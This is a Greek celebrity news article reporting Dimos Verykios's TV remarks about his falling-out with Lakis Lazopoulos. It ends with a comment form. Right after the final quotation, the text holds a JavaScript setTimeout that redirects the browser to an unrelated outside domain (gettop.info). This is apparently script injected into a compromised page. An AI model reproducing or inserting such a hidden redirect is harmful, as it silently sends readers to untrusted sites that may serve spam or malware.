Βερύκιος για Λαζόπουλο: Εγώ δεν ρίχνω συντροφικά μαχαιρώματα (ΒΙΝΤΕΟ)

0
32

 

Για τον Λάκη Λαζόπουλο μίλησε ο Δήμος Βερύκιος σε συνέντευξή του σε τηλεοπτική εκπομπή σημειώνοντας ότι έχει πει ευθέως στον ίδιο όλα όσα ήταν να πει.

Για την παρουσία του Δημήτρη Κοντομηνά στην πρεμιέρα της θεατρικής παράστασης του Λάκη Λαζόπουλου είπε: «Ο Κοντομηνάς δεν ξεχνάει εύκολα, αλλά συγχωρεί εύκολα κι αυτή είναι η μεγαλοψυχία των αθρώπων. Δεν θα ήθελα να μπω σε συζήτηση μέρες που είναι για τον Λάκη Λαζόπουλο. Ό,τι ήταν να πω για τον Λάκη το είπα«.

Και συμπλήρωσε: «Δεν θεωρώ τον εαυτό μου κουτσαβάκι, γιατί δεν ήθελα απλώς να στείλω λάθος μήνυμα. Ότι είμαστε όλοι μια οικογένεια. Ότι με τον Λάκη είναι όλα μέλι γάλα. Για εμένα δεν είμαστε όλοι οικογένεια. Με τον Λάκη δεν είμαστε μέλι γάλα«.

 

«Και το είπα μπροστά του , όχι πίσω του, εγώ δεν ρίχνω συντροφικά μαχαιρώματα. Εμένα ο Λάκης ως θεατράνθρωπος, ως άνθρωπος με θηλυκό μυαλό στη σκέψη, παράγει το μυαλό του, ήταν πάντα από τη δεκαετία του ’80 με συντρόφευε, ήταν συνοδοιπόρος, η σκέψη δική μου και η σκέψη του Λάκη είχαν ένα κοινό πέρασμα από τον μάταιο τούτο κόσμο, άντα με σαγήνευε, όπως μέχρι πρόσφατα. Όμως όταν έναν άνθρωπο τον αγαπάς, τον εκτιμάς, στον διάβα της ζωής, βλέπεις ότι κάνει πράγματα που δεν συμφωνείς οφείλεις κατάματα να του τα λες, ότι πισω από την πλάτη του, αυτά τα καλιαρντά εμένα δεν μου αρέσουν, αυτά που ήταν να πω τα είπα. Τέλος«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here